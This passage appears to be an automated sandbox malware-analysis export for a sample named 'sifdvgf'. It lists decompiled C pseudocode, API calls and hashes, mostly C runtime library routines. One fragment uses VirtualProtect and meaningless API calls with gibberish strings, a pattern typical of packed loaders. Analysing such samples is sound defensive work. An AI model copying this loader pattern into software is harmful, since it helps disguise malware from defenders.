                        0x00406462
                        0x00406465
                        0x0040646b
                        0x0040646e
                        0x00406474
                        0x00406477
                        0x0040647d
                        0x00406480
                        0x00406486
                        0x00406489
                        0x0040648f
                        0x00406495
                        0x00406498
                        0x0040649e
                        0x004064a1
                        0x004064a7
                        0x004064ad
                        0x004064ae
                        0x004064b4
                        0x004064b9
                        0x004064c0
                        0x004064ca
                        0x004064d7
                        0x004064e0
                        0x004064e7
                        0x004064f2
                        0x004064fc
                        0x00406503
                        0x0040650b
                        0x0040650b
                        0x00406511
                        0x00406511
                        0x00406514
                        0x00406519
                        0x0040651e
                        0x0040652a

                        APIs
                          • Part of subcall function 00405A6B: __EH_prolog.LIBCMT ref: 00405A74
                          • Part of subcall function 00405A6B: GlobalAlloc.KERNELBASE(00000000), ref: 00405A98
                          • Part of subcall function 00405A6B: VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 00405AB0
                          • Part of subcall function 00405A6B: GetLastError.KERNEL32 ref: 00405AB8
                        • GetVolumePathNameW.KERNEL32(nulunowuyekufuneyaxesor,00000000,00000000), ref: 004064D7
                        • FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004064E0
                        • GetFileAttributesA.KERNEL32(00000000), ref: 004064E7
                        • SetComputerNameA.KERNEL32(Basiyixeyifopug saluzoha), ref: 004064F2
                        • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004064FC
                        • GetFileType.KERNEL32(00000000), ref: 00406503
                        • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 0040650B
                        Strings
                        • Basiyixeyifopug saluzoha, xrefs: 004064ED
                        • nulunowuyekufuneyaxesor, xrefs: 004064D2
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: FileName$AllocAttributesCalendarChangeComputerErrorFindFirstGlobalH_prologInfoLastNotificationPathProtectShortTypeVirtualVolume
                        • String ID: Basiyixeyifopug saluzoha$nulunowuyekufuneyaxesor
                        • API String ID: 164344972-2523395033
                        • Opcode ID: d16b5b8b8dce798c8910399fb24713b1cd0e9d9bf659044b153efeb6c29e3b30
                        • Instruction ID: fb966b0e15d71144b0bd22afb04916c9cf462eaa64a8b83c211263f238221873
                        • Opcode Fuzzy Hash: d16b5b8b8dce798c8910399fb24713b1cd0e9d9bf659044b153efeb6c29e3b30
                        • Instruction Fuzzy Hash: A2218E76B55280AAE330CBA2FD09AA63768FF54B20F504437F545D61B0DBB50582CB6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E0040A5A2(intOrPtr __ecx) {
                        				void* _t47;
                        				intOrPtr _t48;
                        				void* _t53;
                        				void* _t54;
                        				void* _t56;
                        				intOrPtr _t57;
                        				void* _t58;
                        				void* _t61;
                        
                        				_push(0x2c);
                        				_push(0x417a78);
                        				E0040C128(_t47, _t54, _t56);
                        				_t48 = __ecx;
                        				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                        				_t57 =  *((intOrPtr*)(_t58 + 8));
                        				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                        				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                        				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                        				 *((intOrPtr*)(_t58 - 0x28)) = E00407063(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                        				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00409F6C(__ecx, _t53, _t61) + 0x88));
                        				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x8c));
                        				 *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x88)) = _t57;
                        				 *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                        				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                        				 *(_t58 - 4) = 1;
                        				 *((intOrPtr*)(_t58 - 0x1c)) = E00407108(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                        				 *(_t58 - 4) = 0xfffffffe;
                        				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                        				E0040A6C8(_t48, _t53, _t55, _t57, _t61);
                        				return E0040C16D( *((intOrPtr*)(_t58 - 0x1c)));
                        			}











                        0x0040a5a2
                        0x0040a5a4
                        0x0040a5a9
                        0x0040a5ae
                        0x0040a5b0
                        0x0040a5b3
                        0x0040a5b6
                        0x0040a5b9
                        0x0040a5c0
                        0x0040a5d1
                        0x0040a5df
                        0x0040a5ed
                        0x0040a5f5
                        0x0040a603
                        0x0040a609
                        0x0040a610
                        0x0040a613
                        0x0040a629
                        0x0040a62c
                        0x0040a6a1
                        0x0040a6a8
                        0x0040a6af
                        0x0040a6bc

                        APIs
                        • __CreateFrameInfo.LIBCMT ref: 0040A5CA
                          • Part of subcall function 00407063: __getptd.LIBCMT ref: 00407071
                          • Part of subcall function 00407063: __getptd.LIBCMT ref: 0040707F
                        • __getptd.LIBCMT ref: 0040A5D4
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __getptd.LIBCMT ref: 0040A5E2
                        • __getptd.LIBCMT ref: 0040A5F0
                        • __getptd.LIBCMT ref: 0040A5FB
                        • _CallCatchBlock2.LIBCMT ref: 0040A621
                          • Part of subcall function 00407108: __CallSettingFrame@12.LIBCMT ref: 00407154
                          • Part of subcall function 0040A6C8: __getptd.LIBCMT ref: 0040A6D7
                          • Part of subcall function 0040A6C8: __getptd.LIBCMT ref: 0040A6E5
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                        • String ID:
                        • API String ID: 1602911419-0
                        • Opcode ID: 8f1d90696a2688ea3936d7946fe7d803b2a0bbc8f3439a3d33c7f88237b36b18
                        • Instruction ID: 7e684faa2fd1f334b094959b8f169ed2d54e211e7372e57f7a86f5eb42b7bb83
                        • Opcode Fuzzy Hash: 8f1d90696a2688ea3936d7946fe7d803b2a0bbc8f3439a3d33c7f88237b36b18
                        • Instruction Fuzzy Hash: 4E110AB1C00309DFDF00EFA5D845AAD77B0FF08314F10856AF894AB292DB399A119F59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E00406B56(char _a4) {
                        				signed int _v16;
                        				char _v20;
                        				long _v24;
                        				signed int _v32;
                        				void* _v36;
                        				long _v40;
                        				void _v60;
                        				void* __edi;
                        				void* _t20;
                        				signed int _t21;
                        				signed int _t26;
                        				DWORD* _t27;
                        				void* _t30;
                        				signed int _t34;
                        				void* _t38;
                        
                        				while(1) {
                        					_t2 =  &_a4; // 0x405855
                        					_t20 = E004078D7(_t30, _t38,  *_t2);
                        					if(_t20 != 0) {
                        						break;
                        					}
                        					_t21 = E00409C75(_a4);
                        					__eflags = _t21;
                        					if(_t21 == 0) {
                        						__eflags =  *0x42e660 & 0x00000001;
                        						if(( *0x42e660 & 0x00000001) == 0) {
                        							 *0x42e660 =  *0x42e660 | 0x00000001;
                        							__eflags =  *0x42e660;
                        							E00406B3B(0x42e654);
                        							E00409C4F( *0x42e660, 0x417703);
                        						}
                        						E0040588A( &_v16, 0x42e654);
                        						_push(0x4177a0);
                        						_push( &_v16);
                        						L7();
                        						asm("int3");
                        						_push(0x42e654);
                        						_push(_t38);
                        						_t34 = 8;
                        						_v36 = memcpy( &_v60, 0x401518, _t34 << 2);
                        						_t26 = _v16;
                        						_v32 = _t26;
                        						__eflags = _t26;
                        						if(_t26 != 0) {
                        							__eflags =  *_t26 & 0x00000008;
                        							if(( *_t26 & 0x00000008) != 0) {
                        								_v20 = 0x1994000;
                        							}
                        						}
                        						_t27 =  &_v20;
                        						RaiseException(_v40, _v36, _v24, _t27);
                        						return _t27;
                        					} else {
                        						continue;
                        					}
                        					L11:
                        				}
                        				return _t20;
                        				goto L11;
                        			}


















                        0x00406b6d
                        0x00406b6d
                        0x00406b70
                        0x00406b78
                        0x00000000
                        0x00000000
                        0x00406b63
                        0x00406b69
                        0x00406b6b
                        0x00406b7c
                        0x00406b88
                        0x00406b8a
                        0x00406b8a
                        0x00406b93
                        0x00406b9d
                        0x00406ba2
                        0x00406ba7
                        0x00406bac
                        0x00406bb4
                        0x00406bb5
                        0x00406bba
                        0x00406bc6
                        0x00406bc7
                        0x00406bca
                        0x00406bd5
                        0x00406bd8
                        0x00406bdc
                        0x00406be0
                        0x00406be2
                        0x00406be4
                        0x00406be7
                        0x00406be9
                        0x00406be9
                        0x00406be7
                        0x00406bf0
                        0x00406bfd
                        0x00406c04
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406b6b
                        0x00406b7b
                        0x00000000

                        APIs
                        • _malloc.LIBCMT ref: 00406B70
                          • Part of subcall function 004078D7: __FF_MSGBANNER.LIBCMT ref: 004078FA
                          • Part of subcall function 004078D7: __NMSG_WRITE.LIBCMT ref: 00407901
                          • Part of subcall function 004078D7: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,004104F5,00000001,00000001,00000001,?,0040DAD7,00000018,00417BD8,0000000C,0040DB68), ref: 0040794E
                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00406B93
                          • Part of subcall function 00406B3B: std::exception::exception.LIBCMT ref: 00406B47
                        • __CxxThrowException@8.LIBCMT ref: 00406BB5
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                        • String ID: TB$UX@
                        • API String ID: 3715980512-2156152108
                        • Opcode ID: f5f13009a3e2b1de24221d6bad4e3344780dabd098660a51c124c6ab0b4c5c10
                        • Instruction ID: e03a47e3d7dbfed10d582903bf367da44c0a492470d6b0e3d614105ffc528273
                        • Opcode Fuzzy Hash: f5f13009a3e2b1de24221d6bad4e3344780dabd098660a51c124c6ab0b4c5c10
                        • Instruction Fuzzy Hash: 5CF0E271A0412866DB187622DC06D5A3BB89B20318B51407FF813F10D2DF7DB952815D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E0040A2F1(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                        				signed int _v8;
                        				intOrPtr _t11;
                        				intOrPtr* _t15;
                        				intOrPtr* _t19;
                        				void* _t23;
                        
                        				_t25 = __edi;
                        				_t24 = __edx;
                        				_t11 =  *((intOrPtr*)( *_a4));
                        				if(_t11 == 0xe0434f4d) {
                        					__eflags =  *((intOrPtr*)(E00409F6C(_t23, __edx, __eflags) + 0x90));
                        					if(__eflags > 0) {
                        						_t15 = E00409F6C(_t23, __edx, __eflags) + 0x90;
                        						 *_t15 =  *_t15 - 1;
                        						__eflags =  *_t15;
                        					}
                        					goto L5;
                        				} else {
                        					_t32 = _t11 - 0xe06d7363;
                        					if(_t11 != 0xe06d7363) {
                        						L5:
                        						__eflags = 0;
                        						return 0;
                        					} else {
                        						 *(E00409F6C(_t23, __edx, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                        						_push(8);
                        						_push(0x417b18);
                        						E0040C128(_t23, __edi, __esi);
                        						_t19 =  *((intOrPtr*)(E00409F6C(_t23, __edx, _t32) + 0x78));
                        						if(_t19 != 0) {
                        							_v8 = _v8 & 0x00000000;
                        							 *_t19();
                        							_v8 = 0xfffffffe;
                        						}
                        						return E0040C16D(E0041069C(_t23, _t24, _t25));
                        					}
                        				}
                        			}








                        0x0040a2f1
                        0x0040a2f1
                        0x0040a2fb
                        0x0040a302
                        0x0040a321
                        0x0040a328
                        0x0040a32f
                        0x0040a334
                        0x0040a334
                        0x0040a334
                        0x00000000
                        0x0040a304
                        0x0040a304
                        0x0040a309
                        0x0040a336
                        0x0040a336
                        0x0040a339
                        0x0040a30b
                        0x0040a310
                        0x0040aefb
                        0x0040aefd
                        0x0040af02
                        0x0040af0c
                        0x0040af11
                        0x0040af13
                        0x0040af17
                        0x0040af22
                        0x0040af22
                        0x0040af33
                        0x0040af33
                        0x0040a309

                        APIs
                        • __getptd.LIBCMT ref: 0040A30B
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __getptd.LIBCMT ref: 0040A31C
                        • __getptd.LIBCMT ref: 0040A32A
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: __getptd$__amsg_exit__getptd_noexit
                        • String ID: MOC$csm
                        • API String ID: 803148776-1389381023
                        • Opcode ID: afda627553e1d3404fb2c680ee2ca1c5e0fbcedafb92ff1583f665337c3a5b1c
                        • Instruction ID: 622605f05806e43214a8a41ef03f34c1d013f3cc9fc1b6c3fd85fef28c091024
                        • Opcode Fuzzy Hash: afda627553e1d3404fb2c680ee2ca1c5e0fbcedafb92ff1583f665337c3a5b1c
                        • Instruction Fuzzy Hash: 11E09A36514304DFDB20AB75C04AB6A3698EB49318F1540B6A9C8D73A3D73CDCA4959B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E0040ECF3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t15;
                        				LONG* _t21;
                        				long _t23;
                        				void* _t31;
                        				LONG* _t33;
                        				void* _t34;
                        				void* _t35;
                        
                        				_t35 = __eflags;
                        				_t29 = __edx;
                        				_t25 = __ebx;
                        				_push(0xc);
                        				_push(0x417c18);
                        				E0040C128(__ebx, __edi, __esi);
                        				_t31 = E00409F6C(__ebx, __edx, _t35);
                        				_t15 =  *0x42d194; // 0xfffffffe
                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                        					E0040DB4D(_t25, _t31, 0xd);
                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                        					_t33 =  *(_t31 + 0x68);
                        					 *(_t34 - 0x1c) = _t33;
                        					__eflags = _t33 -  *0x42d098; // 0x22c15e8
                        					if(__eflags != 0) {
                        						__eflags = _t33;
                        						if(_t33 != 0) {
                        							_t23 = InterlockedDecrement(_t33);
                        							__eflags = _t23;
                        							if(_t23 == 0) {
                        								__eflags = _t33 - 0x42cc70;
                        								if(__eflags != 0) {
                        									_push(_t33);
                        									E004079A1(_t25, _t31, _t33, __eflags);
                        								}
                        							}
                        						}
                        						_t21 =  *0x42d098; // 0x22c15e8
                        						 *(_t31 + 0x68) = _t21;
                        						_t33 =  *0x42d098; // 0x22c15e8
                        						 *(_t34 - 0x1c) = _t33;
                        						InterlockedIncrement(_t33);
                        					}
                        					 *(_t34 - 4) = 0xfffffffe;
                        					E0040ED8E();
                        				} else {
                        					_t33 =  *(_t31 + 0x68);
                        				}
                        				if(_t33 == 0) {
                        					E0040CCA3(_t29, 0x20);
                        				}
                        				return E0040C16D(_t33);
                        			}










                        0x0040ecf3
                        0x0040ecf3
                        0x0040ecf3
                        0x0040ecf3
                        0x0040ecf5
                        0x0040ecfa
                        0x0040ed04
                        0x0040ed06
                        0x0040ed0e
                        0x0040ed2f
                        0x0040ed35
                        0x0040ed39
                        0x0040ed3c
                        0x0040ed3f
                        0x0040ed45
                        0x0040ed47
                        0x0040ed49
                        0x0040ed4c
                        0x0040ed52
                        0x0040ed54
                        0x0040ed56
                        0x0040ed5c
                        0x0040ed5e
                        0x0040ed5f
                        0x0040ed64
                        0x0040ed5c
                        0x0040ed54
                        0x0040ed65
                        0x0040ed6a
                        0x0040ed6d
                        0x0040ed73
                        0x0040ed77
                        0x0040ed77
                        0x0040ed7d
                        0x0040ed84
                        0x0040ed16
                        0x0040ed16
                        0x0040ed16
                        0x0040ed1b
                        0x0040ed1f
                        0x0040ed24
                        0x0040ed2c

                        APIs
                        • __getptd.LIBCMT ref: 0040ECFF
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __amsg_exit.LIBCMT ref: 0040ED1F
                        • __lock.LIBCMT ref: 0040ED2F
                        • InterlockedDecrement.KERNEL32(?), ref: 0040ED4C
                        • InterlockedIncrement.KERNEL32(022C15E8), ref: 0040ED77
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                        • String ID:
                        • API String ID: 4271482742-0
                        • Opcode ID: f597ff586386ee98be70c95fc1552d6985489a0103feaeef2b68afe6ec2927bc
                        • Instruction ID: 298bf980c9c0aec7c7d52094cac1c499a146b192491b880d0050c6e3868dceb6
                        • Opcode Fuzzy Hash: f597ff586386ee98be70c95fc1552d6985489a0103feaeef2b68afe6ec2927bc
                        • Instruction Fuzzy Hash: 75018E31E00622D7D721AB26A84579A7360EF04B29F00053BE914773D1C73C68A28BCD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E004079A1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr* _t10;
                        				intOrPtr _t13;
                        				intOrPtr _t23;
                        				void* _t25;
                        
                        				_push(0xc);
                        				_push(0x417928);
                        				_t8 = E0040C128(__ebx, __edi, __esi);
                        				_t23 =  *((intOrPtr*)(_t25 + 8));
                        				if(_t23 == 0) {
                        					L9:
                        					return E0040C16D(_t8);
                        				}
                        				if( *0x42f134 != 3) {
                        					_push(_t23);
                        					L7:
                        					if(HeapFree( *0x42eb04, 0, ??) == 0) {
                        						_t10 = E00407F57();
                        						 *_t10 = E00407F15(GetLastError());
                        					}
                        					goto L9;
                        				}
                        				E0040DB4D(__ebx, __edi, 4);
                        				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                        				_t13 = E0040DB80(_t23);
                        				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                        				if(_t13 != 0) {
                        					_push(_t23);
                        					_push(_t13);
                        					E0040DBB0();
                        				}
                        				 *(_t25 - 4) = 0xfffffffe;
                        				_t8 = E004079F7();
                        				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                        					goto L9;
                        				} else {
                        					_push( *((intOrPtr*)(_t25 + 8)));
                        					goto L7;
                        				}
                        			}







                        0x004079a1
                        0x004079a3
                        0x004079a8
                        0x004079ad
                        0x004079b2
                        0x00407a29
                        0x00407a2e
                        0x00407a2e
                        0x004079bb
                        0x00407a00
                        0x00407a01
                        0x00407a11
                        0x00407a13
                        0x00407a26
                        0x00407a28
                        0x00000000
                        0x00407a11
                        0x004079bf
                        0x004079c5
                        0x004079ca
                        0x004079d0
                        0x004079d5
                        0x004079d7
                        0x004079d8
                        0x004079d9
                        0x004079df
                        0x004079e0
                        0x004079e7
                        0x004079f0
                        0x00000000
                        0x004079f2
                        0x004079f2
                        0x00000000
                        0x004079f2

                        APIs
                        • __lock.LIBCMT ref: 004079BF
                          • Part of subcall function 0040DB4D: __mtinitlocknum.LIBCMT ref: 0040DB63
                          • Part of subcall function 0040DB4D: __amsg_exit.LIBCMT ref: 0040DB6F
                          • Part of subcall function 0040DB4D: EnterCriticalSection.KERNEL32(00409F0F,00409F0F,?,0041588A,00000004,00417DC0,0000000C,0041053F,00000001,00409F1E,00000000,00000000,00000000,?,00409F1E,00000001), ref: 0040DB77
                        • ___sbh_find_block.LIBCMT ref: 004079CA
                        • ___sbh_free_block.LIBCMT ref: 004079D9
                        • HeapFree.KERNEL32(00000000,00000001,00417928,0000000C,0040DB2E,00000000,00417BD8,0000000C,0040DB68,00000001,00409F0F,?,0041588A,00000004,00417DC0,0000000C), ref: 00407A09
                        • GetLastError.KERNEL32(?,0041588A,00000004,00417DC0,0000000C,0041053F,00000001,00409F1E,00000000,00000000,00000000,?,00409F1E,00000001,00000214), ref: 00407A1A
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 2714421763-0
                        • Opcode ID: c12663648c0d4e2af9016428884d4000b2d59aff5cd47b208b817aec9f7eb85a
                        • Instruction ID: 8f777d082abfc0d878f9bfaaf4c1826c71b29845cb59ede7f12ddd66b922c452
                        • Opcode Fuzzy Hash: c12663648c0d4e2af9016428884d4000b2d59aff5cd47b208b817aec9f7eb85a
                        • Instruction Fuzzy Hash: 89014471E092069AEF20BBB69C06B5F7A649F00764F50053FF504BA1D1CA7CBA458E5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 21%
                        			E0040A94F(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                        				void* __ebp;
                        				intOrPtr _t19;
                        				void* _t21;
                        				void* _t22;
                        				void* _t24;
                        				intOrPtr* _t25;
                        				void* _t26;
                        				void* _t27;
                        
                        				_t26 = __esi;
                        				_t25 = __edi;
                        				_t21 = __ebx;
                        				_t29 = _a20;
                        				if(_a20 != 0) {
                        					_push(_a20);
                        					_push(__ebx);
                        					_push(__esi);
                        					_push(_a4);
                        					E0040A8BD(__ebx, __edi, __esi, _t29);
                        					_t27 = _t27 + 0x10;
                        				}
                        				_t30 = _a28;
                        				_push(_a4);
                        				if(_a28 != 0) {
                        					_push(_a28);
                        				} else {
                        					_push(_t26);
                        				}
                        				E00406DBB(_t22);
                        				_push( *_t25);
                        				_push(_a16);
                        				_push(_a12);
                        				_push(_t26);
                        				E0040A33A(_t21, _t24, _t25, _t26, _t30);
                        				_push(0x100);
                        				_push(_a24);
                        				_t19 =  *((intOrPtr*)(_t25 + 4)) + 1;
                        				_push(_a16);
                        				 *((intOrPtr*)(_t26 + 8)) = _t19;
                        				_push(_a8);
                        				_push(_t26);
                        				_push(_a4);
                        				"j,hxzA"();
                        				if(_t19 != 0) {
                        					E00406D74(_t19, _t26);
                        					return _t19;
                        				}
                        				return _t19;
                        			}











                        0x0040a94f
                        0x0040a94f
                        0x0040a94f
                        0x0040a954
                        0x0040a958
                        0x0040a95a
                        0x0040a95d
                        0x0040a95e
                        0x0040a95f
                        0x0040a962
                        0x0040a967
                        0x0040a967
                        0x0040a96a
                        0x0040a96e
                        0x0040a971
                        0x0040a976
                        0x0040a973
                        0x0040a973
                        0x0040a973
                        0x0040a979
                        0x0040a97e
                        0x0040a980
                        0x0040a983
                        0x0040a986
                        0x0040a987
                        0x0040a98f
                        0x0040a994
                        0x0040a997
                        0x0040a998
                        0x0040a99b
                        0x0040a99e
                        0x0040a9a4
                        0x0040a9a5
                        0x0040a9a8
                        0x0040a9b2
                        0x0040a9b6
                        0x00000000
                        0x0040a9b6
                        0x0040a9bc

                        APIs
                        • ___BuildCatchObject.LIBCMT ref: 0040A962
                          • Part of subcall function 0040A8BD: ___BuildCatchObjectHelper.LIBCMT ref: 0040A8F3
                        • _UnwindNestedFrames.LIBCMT ref: 0040A979
                        • ___FrameUnwindToState.LIBCMT ref: 0040A987
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                        • String ID: csm
                        • API String ID: 2163707966-1018135373
                        • Opcode ID: f7775c5282b144064f6aa1fbcbd92dd75a2391eadffbc48365066a24746a3b62
                        • Instruction ID: c18afe15dfa004b4b11c55b0fe6cb4d4148c85d4026d47cf0b1876583a05e907
                        • Opcode Fuzzy Hash: f7775c5282b144064f6aa1fbcbd92dd75a2391eadffbc48365066a24746a3b62
                        • Instruction Fuzzy Hash: 32012871100209BBDF126F52CC45EEE3E6AEF08394F058426BD09241A0D73A9972DBAA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 65%
                        			E004095AF() {
                        				signed long long _v12;
                        				signed int _v20;
                        				signed long long _v28;
                        				signed char _t8;
                        
                        				_t8 = GetModuleHandleA("KERNEL32");
                        				if(_t8 == 0) {
                        					L6:
                        					_v20 =  *0x4016f8;
                        					_v28 =  *0x4016f0;
                        					asm("fsubr qword [ebp-0x18]");
                        					_v12 = _v28 / _v20 * _v20;
                        					asm("fld1");
                        					asm("fcomp qword [ebp-0x8]");
                        					asm("fnstsw ax");
                        					if((_t8 & 0x00000005) != 0) {
                        						return 0;
                        					} else {
                        						return 1;
                        					}
                        				} else {
                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                        					if(__eax == 0) {
                        						goto L6;
                        					} else {
                        						_push(0);
                        						return __eax;
                        					}
                        				}
                        			}







                        0x004095b4
                        0x004095bc
                        0x004095d3
                        0x0040957f
                        0x00409588
                        0x00409594
                        0x00409597
                        0x0040959a
                        0x0040959c
                        0x0040959f
                        0x004095a4
                        0x004095ae
                        0x004095a6
                        0x004095aa
                        0x004095aa
                        0x004095be
                        0x004095c4
                        0x004095cc
